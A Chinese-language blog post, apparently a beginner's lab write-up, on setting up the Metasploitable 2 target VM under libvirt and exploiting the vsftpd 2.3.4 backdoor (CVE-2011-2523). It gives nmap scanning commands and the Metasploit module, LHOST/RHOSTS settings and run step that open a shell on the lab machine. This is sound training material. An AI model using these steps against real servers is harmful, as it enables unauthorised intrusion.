Featured image of post 第一次渗透:CVE-2011-2523

第一次渗透:CVE-2011-2523

字数: 876

学习渗透第一天,记录下第一次渗透靶机的过程。

首先需要 nmap 和 metasploit,这里这里都是在 ArchLinux 下使用 blackarch 软件源安装的。

搭建靶机

靶机使用的是 Metasploitable 2,在这里下载:https://docs.rapid7.com/metasploit/metasploitable-2/
下载下来是 vmware 的配置。不过我用 virt-manager 的 qemu 配置,需要做一些转换。
首先,原来 vmware 配置中有两个网络映射:

网卡 VMware 模式 libvirt 对应 作用
ethernet0 NAT default (virbr0, 192.168.122.0/24) VM 访问外网
ethernet1 Host-only hostonly (virbr1, 192.168.100.0/24) 仅宿主机 ↔ VM 通信

这里隔离网络还需要用 virsh 创建一个:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# 1. 定义网络
sudo virsh net-define /dev/stdin <<'EOF'
<network>
  <name>hostonly</name>
  <bridge name="virbr1"/>
  <ip address="192.168.100.1" netmask="255.255.255.0">
    <dhcp>
      <range start="192.168.100.2" end="192.168.100.254"/>
    </dhcp>
  </ip>
</network>
EOF

# 2. 启动并设置开机自启
sudo virsh net-start hostonly
sudo virsh net-autostart hostonly

检查网络状态:

1
virsh net-list --all

输出这样就成功了:

转换 vmdk 虚拟硬盘为 qcow2

1
qemu-img convert -f vmdk -O qcow2 Metasploitable.vmdk Metasploitable.qcow2

在 virt-manager 中导入这个盘,选择比较早的 Linux 版本(靶机的 Linux 用的是 Linux 2.6),创建虚拟机。

这里 CPU 给 1 核心,内存给 512 MB 就足够。还需要设置网络,添加 hostonly 网络,并且两张虚拟网卡都设置为 rtl8139,不然靶机内核识别不了。

就是编辑网卡 xml,将 <model type=''/> 设置为 rtl8139。最后效果如下:

现在应该可以进入虚拟机。账号密码都是 msfadmin 。进入 shell 后运行 ip addr 查看网卡配置:

这样靶机就配置好了。

扫描端口漏洞

Metasploitable 2 这个靶机漏洞很多,这里就只打 CVE-2011-2523 也就是 ftp-vsftpd-backdoor。

通过上图知道虚拟机的 ip 为 192.168.122.228。不知道也没关系,可以用 nmap 扫网段。

1
nmap -sn 192.168.122.0/24

输出:

1
2
3
4
5
6
7
❯ nmap -sn 192.168.122.0/24                        
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-09 11:23 +0800
Nmap scan report for 192.168.122.1
Host is up (0.000079s latency).
Nmap scan report for 192.168.122.228
Host is up (0.00053s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.50 secondso

可见 192.168.122.228 就是我们的靶机。

接下来可以扫端口:

1
nmap 192.168.122.228

扫操作系统:

1
sudo nmap -O 192.168.122.228

可见内核版本是 2.6 非常远古。

最重要的就是扫描是否有漏洞:

1
nmap --script ftp-vsftpd-backdoor 192.168.122.228

确定有这个漏洞:CVE-2011-2523 后接下来就是用 metasploit 开始打靶机了。

渗透

1
msfconsole

进入 metasploit-framework 的控制台。

1
search vsftpd_234_backdoor

搜索漏洞:

输入 use 0 使用第一个。
先设置 LHOST:

ip addr 查看攻击机的 ip 地址,然后设置好地址。

1
set LHOST xxx.xxx.x.x

然后设置靶机地址:

1
set rhosts 192.168.122.228

之后输入 run 就开始打靶机

可以输入 help 查看能做什么。比如可以进入 shell:

这样我们就可以执行 shell 命令,打通靶机了。